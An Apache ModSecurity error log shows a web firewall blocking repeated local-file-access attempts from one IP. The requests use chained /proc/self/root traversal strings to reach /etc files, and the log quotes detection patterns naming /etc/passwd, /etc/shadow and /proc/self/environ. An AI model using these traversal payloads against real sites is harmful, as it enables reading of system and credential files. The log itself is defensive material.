[Tue Mar 17 08:48:22.735511 2026] [:error] [pid 2473:tid 140411708356352] [client 74.7.243.203:37962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_hqBJNF7axNlVR0X3VwAAAAQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 08:48:50.219030 2026] [:error] [pid 2473:tid 140411624429312] [client 74.7.243.203:47860] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_oqBJNF7axNlVR0X3iwAAAA4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:51.543457 2026] [:error] [pid 1961:tid 140411699963648] [client 74.7.243.203:36342] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_o3RXaaWotPICgYsfNwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:52.795612 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.243.203:36352] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_pJDEJR9VXonE_-1IQwAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:55.022439 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.243.203:36356] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_ppqmL8PQht4WJFlB-wAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:57.243875 2026] [:error] [pid 2325:tid 140411574073088] [client 74.7.243.203:36366] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_qO82sZHvlq4xgHq9ugAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:58.528264 2026] [:error] [pid 7000:tid 140411666392832] [client 74.7.243.203:36374] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_qhePVOt35XCGZP8qGgAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:48:58.950585 2026] [:error] [pid 1210:tid 140411616036608] [client 74.7.243.203:36386] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_qlKJy4A1bGlmj9BP6AAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:00.295830 2026] [:error] [pid 11293:tid 140411641214720] [client 74.7.243.203:40610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_rNCmCSWTlPouqorGJgAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:01.467935 2026] [:error] [pid 1016:tid 140411666392832] [client 74.7.243.203:40612] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_rZqmL8PQht4WJFlCAAAAAUk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:02.877172 2026] [:error] [pid 1016:tid 140411607643904] [client 74.7.243.203:40622] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_rpqmL8PQht4WJFlCAQAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:08.622594 2026] [:error] [pid 1210:tid 140411632822016] [client 74.7.243.203:40632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_tFKJy4A1bGlmj9BP8QAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:09.906723 2026] [:error] [pid 11469:tid 140411708356352] [client 74.7.243.203:40636] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_tZDEJR9VXonE_-1IVQAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:11.202749 2026] [:error] [pid 2305:tid 140411607643904] [client 74.7.243.203:46116] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_twQohV2v-7oj5HH1ogAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:12.465346 2026] [:error] [pid 7437:tid 140411582465792] [client 74.7.243.203:46124] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_uAeiSKl8TjouI-b8WgAAA9M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:13.766775 2026] [:error] [pid 1961:tid 140411733534464] [client 74.7.243.203:46134] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_uXRXaaWotPICgYsfOwAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:15.041632 2026] [:error] [pid 7000:tid 140411632822016] [client 74.7.243.203:46150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_uxePVOt35XCGZP8qIgAAA40"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:16.344416 2026] [:error] [pid 11469:tid 140411683178240] [client 74.7.243.203:46156] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_vJDEJR9VXonE_-1IXwAAAQc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:17.662582 2026] [:error] [pid 11469:tid 140411574073088] [client 74.7.243.203:46164] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_vZDEJR9VXonE_-1IYQAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:19.604472 2026] [:error] [pid 7437:tid 140411725141760] [client 74.7.243.203:46180] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_vgeiSKl8TjouI-b8YAAAA8I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:20.889288 2026] [:error] [pid 7437:tid 140411691570944] [client 74.7.243.203:47594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abk_wAeiSKl8TjouI-b8YQAAA8Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 08:49:23.280914 2026] [:error] [pid 2325:tid 140411708356352] [client 74.7.243.203:47600] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag 